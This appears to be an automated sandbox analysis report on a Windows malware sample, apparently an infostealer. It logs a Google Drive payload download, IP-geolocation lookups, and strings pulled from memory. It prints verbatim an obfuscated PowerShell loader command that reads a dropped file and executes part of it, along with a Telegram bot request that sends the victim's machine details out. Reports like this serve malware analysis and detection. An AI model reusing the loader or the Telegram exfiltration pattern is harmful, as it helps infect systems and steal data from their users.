Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.9:49694 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20and%20Time:%2009/03/2025%20/%2019:27:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20701188%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 19:53:00 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.1195833009.0000000007A2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.miK
Source: powershell.exe, 00000001.00000002.1188632977.0000000003459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: svchost.exe, 00000004.00000002.2182166036.0000020CE8000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 4PYRGCo1Di.exe, 4PYRGCo1Di.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.1192079621.00000000062A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1189296404.0000000005241000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.1188632977.0000000003459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICE
Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1205281863.0000000008BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co%
Source: msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000001.00000002.1189296404.0000000005241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBAr
Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20a
Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000003.00000002.2196040915.0000000021253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000003.00000002.2196040915.0000000021253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020323000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020323000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: msiexec.exe, 00000003.00000002.2193215280.000000002031E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBAr
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020314000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enpF
Source: powershell.exe, 00000001.00000002.1192079621.00000000062A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1192079621.00000000062A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1192079621.00000000062A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000003.00000002.2179525179.000000000472A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000003.00000002.2179525179.000000000472A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2192279455.000000001F810000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-
Source: msiexec.exe, 00000003.00000002.2179525179.000000000472A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-r
Source: msiexec.exe, 00000003.00000003.1341273439.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2179525179.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000003.00000003.1341273439.00000000047A0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2179525179.0000000004788000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2179525179.000000000476E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-&export=download
Source: msiexec.exe, 00000003.00000003.1341273439.00000000047A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-&export=downloadoo
Source: msiexec.exe, 00000003.00000003.1341273439.00000000047A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-&export=downloadtA
Source: msiexec.exe, 00000003.00000003.1341273439.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2179525179.00000000047B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/t
Source: msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000003.00000002.2196040915.0000000021253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000004.00000003.1203603033.0000020CE7E60000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000001.00000002.1189296404.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1188632977.0000000003418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5f
Source: powershell.exe, 00000001.00000002.1192079621.00000000062A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.000000002024F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.00000000201DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000003.00000002.2193215280.00000000201DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000003.00000002.2193215280.00000000201DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020278000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.000000002024F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.0000000020209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000003.00000002.2196040915.0000000021253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20Y&
Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000003.00000002.2196040915.0000000021253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2196040915.00000000214A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000003.00000003.1281808168.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1284533057.00000000047DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020354000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.0000000020345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: msiexec.exe, 00000003.00000002.2193215280.000000002034F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBAr
Source: msiexec.exe, 00000003.00000002.2193215280.0000000020345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/pF

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.9:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.9:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49710 version: TLS 1.2

Source: C:\Users\user\Desktop\4PYRGCo1Di.exe

Code function: 0_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405582

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Uncrude\4PYRGCo1Di.exe

Jump to dropped file

Source: C:\Users\user\Desktop\4PYRGCo1Di.exe

Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040348F

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2548:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\4PYRGCo1Di.exe "C:\Users\user\Desktop\4PYRGCo1Di.exe"
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: usp10.dll	Jump to behavior
